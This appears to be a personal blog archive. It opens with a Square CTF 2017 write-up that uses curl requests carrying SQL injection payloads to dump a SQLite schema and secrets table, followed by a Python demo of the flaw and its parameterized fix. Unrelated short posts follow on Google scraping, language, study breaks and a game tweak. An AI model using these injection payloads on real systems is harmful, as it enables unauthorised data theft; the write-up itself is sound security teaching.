Write-up: Little Doggy Tables, Square CTF 2017

This is a write-up for the challenge Little Doggy Tables from Square CTF 2017.

The challenge can be found here: https://squarectf.com/challenges/little-doggy-tables

The challenge requires us to use SQL injection to extract the flag from a table in the database.

On running this command:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=Fido"

I got the following output:

dog

Which means I can run SQL queries through this command.

Furthermore, the challenge details also include the source code, which looks like this:

From checking out the source code it is obvious that SQL injection is possible and that SQLite3 was used in the database.

To check if it was working, I ran:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename='"

Which gave this output:

Internal Server Error

unrecognized token: "'\";"

WEBrick/1.3.1 (Ruby/2.3.4/2017-03-30) at little-doggy-tables.capturethesquare.com:443
 

Now that I knew SQL injection was working, I had to access the metadata. Unfortunately, the information_schema table does not exist here since it is SQLite and not MySQL. I searched for an equivalent table in SQLite and came across this question on Stack Overflow:

https://stackoverflow.com/questions/6460671/sqlite-schema-information-metadata#6617764

Which gave me enough to realize that sqlite_master is the information_schema alternative in SQLite. I changed the commands mentioned in the answer to suit my search.

All metadata in SQLite can be accessed simply by using the command:

select sql from sqlite_master

So I modified my payload to:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select sql from sqlite_master-- -"

Which gave the output:

CREATE TABLE operatives (
codename TEXT,
species TEXT,
secret TEXT
)

Now we know both the name of the table and the name of the required column, which is obviously secret. The SQL query that now needs to be executed is:

select group_concat(secret) from operatives

The corresponding payload would be:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select group_concat(secret) from operatives-- -"

The resulting output:

e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e,7448d8798a4380162d4b56f9b452e2f6f9e24e7a,9c6b057a2b9d96a4067a749ee3b3b0158d390cf1,5d9474c0309b7ca09a182d888f73b37a8fe1362c,flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436,ccf271b7830882da1791852baeca1737fcbe4b90,d3964f9dad9f60363c81b688324d95b4ec7c8038,136571b4

On refining the above output we get that the flag is:

flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436
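The root cause and its fix, as an added example that is not the challenge's own code (the challenge runs Ruby; Python's built-in sqlite3 module is used here so it runs offline). The shape of the vulnerable query is an assumption, the rows are constructed sample data, and the inputs are the ones from the curl commands above.

```python
import sqlite3

# Inputs taken from the curl commands in the write-up.
PAGE_INPUTS = [
    "Fido",
    "'",
    "' union select sql from sqlite_master-- -",
    "' union select group_concat(secret) from operatives-- -",
]

def make_db():
    # Columns as in the sqlite_master output above; rows are constructed.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE operatives (codename TEXT, species TEXT, secret TEXT)")
    db.executemany(
        "INSERT INTO operatives VALUES (?, ?, ?)",
        [("Fido", "dog", "constructed-secret-1"),
         ("Tom", "cat", "flag-CONSTRUCTED")],
    )
    return db

def lookup_vulnerable(db, codename):
    # Assumed shape of the flaw: user input is spliced into the SQL text,
    # so a quote in the input ends the string literal and the rest is parsed as SQL.
    sql = "SELECT species FROM operatives WHERE codename = '%s'" % codename
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, codename):
    # Fix: the statement text is constant and the input is bound as a value,
    # so it is only ever compared against the codename column.
    sql = "SELECT species FROM operatives WHERE codename = ?"
    return [row[0] for row in db.execute(sql, (codename,))]

def compare(db):
    # Run every input through both lookups; keep the error text instead of raising.
    results = {}
    for value in PAGE_INPUTS:
        try:
            vuln = lookup_vulnerable(db, value)
        except sqlite3.OperationalError as exc:
            vuln = "error: %s" % exc
        results[value] = (vuln, lookup_parameterized(db, value))
    return results

if __name__ == "__main__":
    for value, (vuln, safe) in compare(make_db()).items():
        print(repr(value), "->", vuln, "|", safe)
```

With the bound parameter, the quote no longer produces a parser error and the union inputs match no codename. Returning a generic error page instead of the database message would also remove the "unrecognized token" hint seen earlier.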

 

Google Search Scraping With Python

Python is a language that allows you to do great things with very little code; it has a great set of powerful libraries and packages. I hope to illustrate this here by demonstrating how you can scrape results off a Google search using a very simple and short Python script. Older versions of such scripts depended on the Google AJAX API, which no longer works; this is an alternative approach.


The way this piece of code works is by using the two modules ‘urllib’ and ‘requests’. These two modules are at the centre of this piece of code. The ‘get’ function of the ‘requests’ module is what allows you to access the specified url and the ‘urllib’ module allows you to read the urls on the page and store/output them.

For this code to work, you will also need the lxml library and the CSSselect python package. These are needed to process the formatting of the results page. lxml does not need any installation and is widely used in python scripts. You can download their package, and read their documentation here: http://lxml.de/

Now for CSSselect, you might get this error if the package is not installed on your system:

To fix this you might want to download the CSSselect package, which you can do from here: https://pypi.python.org/pypi/cssselect

To install this package run this command from the directory where the downloaded .whl file is located:

After doing so, you can run the script and/or use it in your own programs to scrape Google search results. Have fun!

Rules of Language

It is said that rules are meant to be broken when it comes to language, yet there exist Grammar Nazis.
It is frequently suggested by experienced experts to keep it simple, yet simplicity is associated with amateurity.

Language is meant to be a means of communication, advice that it does not require to follow rules is something that is often suggested, but rarely appreciated. Sometimes people feel annoyed at the improper use of the comma or underwhelmed by the simplicity of language used. William Shakespeare did not invent half the words we use today by simply following the rules, the suggestive fact that this generation of laureates refuses to break the rules can affect the future of language.

But is that true? I mean the internet community sure does not follow any rules, it creates trends once in a while, and flips it around again when they feel like it. Change is inevitable in the internet community. Society as a whole is deeply influenced by the language it uses, although English is now being widely used other languages are not easily susceptible to change.

Rules and Regulations are required for keeping chaos out, but it should not prevent you from adding a pause when you feel like it using a comma.

P. S. I don’t know if there is a word called “amateurity” I used in the first paragraph, maybe it exists maybe it does not. The thing is, nobody stopped me from using it!

Language has no rules.

The Passive Mindset for Learning

As many of you might know I am a student, and 11 & 12 are considered two of the most crucial career defining years. I am about to face these years and it all starts with a break. This summer break is considered different from all the other ones that led to this, the techniques used to get past 10th might not work any longer in the coming years. Afraid of being left behind, most students during this time go to crash courses and similar so called foundation courses.

All of us cannot do this and even if we try, most of us may feel underwhelmed by the basic concepts being taught. Keep in mind that a solid foundation on the basics is very necessary but it does not have to be rebuilt, it may perhaps require some reinforcement which may be fulfilled by simple revision. The point I am trying to make here is the fact that all of us as students will be offered breaks, and rather than taking them many of us try to attain an edge over others during this time.

The first thing to understand here is that all of us need breaks. While I also do understand that hard work and dedication are essential to success, maybe we can tone it down for a while. I like to call this attitude a passive mindset for learning, although I am not really sure if it's very effective if you maintain it for longer than needed.

But I personally need it and it helps me a lot. When you are offered a break, take it and then maybe read a book, walk in a park, practice some football with a friend or two and passively just think about what you're doing, what you want to do, etc. Don’t overthink all this stuff, rather let your thoughts flow. If you're reading a book let it all in, what you may read might help in the future and help your language. It's better if you do not watch a lot of action movies and stuff but don’t hesitate if you feel like you really need to watch a movie. Most of all, let all of it inspire you.

Steve Jobs says that you need to believe in something, something like destiny or karma which enforces the belief that all that you do today – even instinctively, will eventually help you in the future.

I buy that.

Metal Gear Solid V: Ground Zeroes PC – Reduce Lag and Random Freezes

MGSV:GZ is a greatly optimized game, but with so many random PC configurations out there, like every other game it comes with a few flaws too. These include occasional lagging and freezing. Thankfully I was able to fix them.

Although a little out of the ordinary, it can be done by opening up the task manager while running the game:

>>Details Tab >> right click MgsGroundZeroes.exe (both)>> real time priority.


Note that this has to be done every time you start the game, and for both tasks called MgsGroundZeroes.exe.

Hope that this will improve your game’s performance.